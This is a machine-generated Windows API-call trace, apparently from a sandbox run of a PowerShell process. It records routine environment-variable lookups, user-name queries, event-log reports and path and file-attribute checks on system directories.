	[0407.612] ReportEventW (hEventLog=0x1b860008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2f39118*="Variable", lpRawData=0x2f38ea8) returned 1
	[0407.648] CoTaskMemAlloc (cb=0x104) returned 0x147db0
	[0407.648] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x147db0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0407.648] CoTaskMemFree (pv=0x147db0) 
	[0407.651] CoTaskMemAlloc (cb=0x104) returned 0x147db0
	[0407.651] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x147db0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0407.651] CoTaskMemFree (pv=0x147db0) 
	[0407.653] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x28d1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0407.653] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x28d100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0407.653] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x28d100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0407.654] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x28d100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0408.119] CoTaskMemAlloc (cb=0x804) returned 0x1b78cf60
	[0408.119] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b78cf60, nSize=0x28d908 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x28d908) returned 0x1
	[0408.119] CoTaskMemFree (pv=0x1b78cf60) 
	[0408.119] CoTaskMemAlloc (cb=0x204) returned 0x12b510
	[0408.119] GetUserNameW (in: lpBuffer=0x12b510, pcbBuffer=0x28d948 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x28d948) returned 1
	[0408.120] CoTaskMemFree (pv=0x12b510) 
	[0408.120] ReportEventW (hEventLog=0x1b860008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2f4cd30*="Certificate", lpRawData=0x2f4cac0) returned 1
	[0408.481] CoTaskMemAlloc (cb=0x104) returned 0x147db0
	[0408.482] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x147db0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0408.482] CoTaskMemFree (pv=0x147db0) 
	[0408.485] GetLogicalDrives () returned 0x4
	[0408.485] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x28d590, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0408.485] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0408.486] CoTaskMemAlloc (cb=0x20e) returned 0x16ba90
	[0408.486] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x16ba90 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0408.486] CoTaskMemFree (pv=0x16ba90) 
	[0408.488] CoTaskMemAlloc (cb=0x104) returned 0x147db0
	[0408.488] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x147db0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0408.488] CoTaskMemFree (pv=0x147db0) 
	[0408.488] CoTaskMemAlloc (cb=0x104) returned 0x147db0
	[0408.488] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x147db0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0408.488] CoTaskMemFree (pv=0x147db0) 
	[0408.504] CoTaskMemAlloc (cb=0x104) returned 0x147db0
	[0408.504] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x147db0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0408.504] CoTaskMemFree (pv=0x147db0) 
	[0408.505] CoTaskMemAlloc (cb=0x104) returned 0x147db0
	[0408.505] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x147db0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0408.506] CoTaskMemFree (pv=0x147db0) 
	[0408.506] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x28d2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0408.506] SetErrorMode (uMode=0x1) returned 0x1
	[0408.506] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x28d550 | out: lpFileInformation=0x28d550*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0408.506] SetErrorMode (uMode=0x1) returned 0x1
	[0408.506] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x28d2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0408.507] SetErrorMode (uMode=0x1) returned 0x1
	[0408.507] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x28d550 | out: lpFileInformation=0x28d550*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0408.507] SetErrorMode (uMode=0x1) returned 0x1
	[0408.507] CoTaskMemAlloc (cb=0x104) returned 0x147db0
	[0408.507] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x147db0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0408.507] CoTaskMemFree (pv=0x147db0) 
	[0408.512] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x28d490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0408.512] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x28d300, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0408.513] SetErrorMode (uMode=0x1) returned 0x1
	[0408.513] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x28d510 | out: lpFileInformation=0x28d510*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0408.513] SetErrorMode (uMode=0x1) returned 0x1
	[0408.513] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x28d300, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0408.513] SetErrorMode (uMode=0x1) returned 0x1
	[0408.513] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x28d510 | out: lpFileInformation=0x28d510*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0408.513] SetErrorMode (uMode=0x1) returned 0x1
	[0408.513] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x28d310, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0408.513] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x28d200, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0408.513] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x28d300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0408.513] SetErrorMode (uMode=0x1) returned 0x1
	[0408.514] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x28d510 | out: lpFileInformation=0x28d510*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0408.514] SetErrorMode (uMode=0x1) returned 0x1
	[0408.514] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x28d300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0408.514] SetErrorMode (uMode=0x1) returned 0x1
	[0408.514] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x28d510 | out: lpFileInformation=0x28d510*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0408.514] SetErrorMode (uMode=0x1) returned 0x1
	[0408.514] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x28d310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0408.514] GetFullPathNameW (in: lpFileName="C:\\Windows\\.", nBufferLength=0x105, lpBuffer=0x28d200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0408.514] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x28d300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0408.514] SetErrorMode (uMode=0x1) returned 0x1
	[0408.514] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x28d510 | out: lpFileInformation=0x28d510*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0408.515] SetErrorMode (uMode=0x1) returned 0x1
	[0408.515] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x28d300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0408.515] SetErrorMode (uMode=0x1) returned 0x1
	[0408.515] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x28d510 | out: lpFileInformation=0x28d510*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0408.515] SetErrorMode (uMode=0x1) returned 0x1
	[0408.515] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x28d310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0408.515] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x105, lpBuffer=0x28d200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0408.515] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x28d340, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0408.515] SetErrorMode (uMode=0x1) returned 0x1
	[0408.516] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x28d550 | out: lpFileInformation=0x28d550*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0408.516] SetErrorMode (uMode=0x1) returned 0x1
	[0408.516] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x28d340, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0408.516] SetErrorMode (uMode=0x1) returned 0x1
	[0408.516] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x28d550 | out: lpFileInformation=0x28d550*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0408.516] SetErrorMode (uMode=0x1) returned 0x1
	[0408.516] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x28d350, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0408.516] GetFullPathNameW (in: lpFileName="C:\\Windows\\.", nBufferLength=0x105, lpBuffer=0x28d240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0408.516] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x28d340, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0408.516] SetErrorMode (uMode=0x1) returned 0x1
	[0408.516] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x28d550 | out: lpFileInformation=0x28d550*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0408.517] SetErrorMode (uMode=0x1) returned 0x1
	[0408.517] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x28d340, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0408.517] SetErrorMode (uMode=0x1) returned 0x1
	[0408.517] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x28d550 | out: lpFileInformation=0x28d550*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0408.517] SetErrorMode (uMode=0x1) returned 0x1
	[0408.517] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x28d350, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0408.517] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x105, lpBuffer=0x28d240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0408.519] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x28d5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0408.519] SetErrorMode (uMode=0x1) returned 0x1
	[0408.519] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x28d810 | out: lpFileInformation=0x28d810*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0408.519] SetErrorMode (uMode=0x1) returned 0x1
	[0408.945] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0408.945] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0408.945] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0408.945] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0409.342] CoTaskMemAlloc (cb=0x804) returned 0x1b78cf60
	[0409.342] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b78cf60, nSize=0x28db78 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x28db78) returned 0x1
	[0409.342] CoTaskMemFree (pv=0x1b78cf60) 
	[0409.342] CoTaskMemAlloc (cb=0x204) returned 0x12b510
	[0409.342] GetUserNameW (in: lpBuffer=0x12b510, pcbBuffer=0x28dbb8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x28dbb8) returned 1
	[0409.343] CoTaskMemFree (pv=0x12b510) 
	[0409.344] ReportEventW (hEventLog=0x1b860008, wType=0x4, wCategory=0x4, dwEventID=0x190, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2f85a18*="Available", lpRawData=0x2f857a8) returned 1
	[0409.698] CoTaskMemAlloc (cb=0x104) returned 0x147db0
	[0409.698] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x147db0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0409.698] CoTaskMemFree (pv=0x147db0) 
	[0409.699] CoTaskMemAlloc (cb=0x104) returned 0x147db0
	[0409.699] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x147db0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0409.699] CoTaskMemFree (pv=0x147db0) 
	[0409.701] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0409.702] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0409.702] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0409.705] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0409.705] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0409.705] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0409.705] CoTaskMemAlloc (cb=0x104) returned 0x147db0
	[0409.706] GetEnvironmentVariableW (in: lpName="HomeDrive", lpBuffer=0x147db0, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0409.706] CoTaskMemFree (pv=0x147db0) 
	[0409.706] CoTaskMemAlloc (cb=0x104) returned 0x147db0
	[0409.706] GetEnvironmentVariableW (in: lpName="HomePath", lpBuffer=0x147db0, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0409.706] CoTaskMemFree (pv=0x147db0) 
	[0409.706] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0409.706] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0409.706] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0409.707] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0409.707] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0409.707] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
